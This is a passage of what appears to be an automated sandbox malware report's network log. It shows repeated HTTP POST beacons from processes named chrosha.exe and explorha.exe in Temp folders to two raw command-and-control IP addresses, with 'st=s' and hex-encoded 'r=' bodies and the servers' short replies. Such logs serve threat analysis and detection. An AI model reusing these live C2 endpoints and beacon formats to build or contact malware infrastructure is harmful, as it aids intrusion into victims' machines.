                                                                                                                                                                                                                                      Apr 19, 2024 03:32:54.136677980 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      637192.168.2.550483193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:54.251106024 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:54.495412111 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      638192.168.2.550484193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:54.488867044 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:54.730545044 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      639192.168.2.550485193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:54.844367981 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:55.083471060 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      640192.168.2.550486193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:54.979707956 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:55.228744030 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      641192.168.2.550487193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:55.334659100 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:55.589148045 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      642192.168.2.550488193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:55.581634045 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:55.826241016 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      643192.168.2.550489193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:55.941291094 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:56.184322119 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      644192.168.2.550490193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:56.080595016 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:56.336293936 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      645192.168.2.550491193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:56.437865973 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:56.691598892 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      646192.168.2.550492193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:56.697947979 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:56.948544979 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:56 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      647192.168.2.550493193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:57.051670074 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:57.295495987 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      648192.168.2.550494193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:57.199286938 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:57.450211048 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      649192.168.2.550495193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:57.545366049 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:57.794579029 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      650192.168.2.550496193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:57.807547092 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:58.056586027 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:57 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      651192.168.2.550497193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:58.149172068 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:58.394083023 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      652192.168.2.550498193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:58.308418989 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:58.561166048 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:58 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      653192.168.2.550499193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
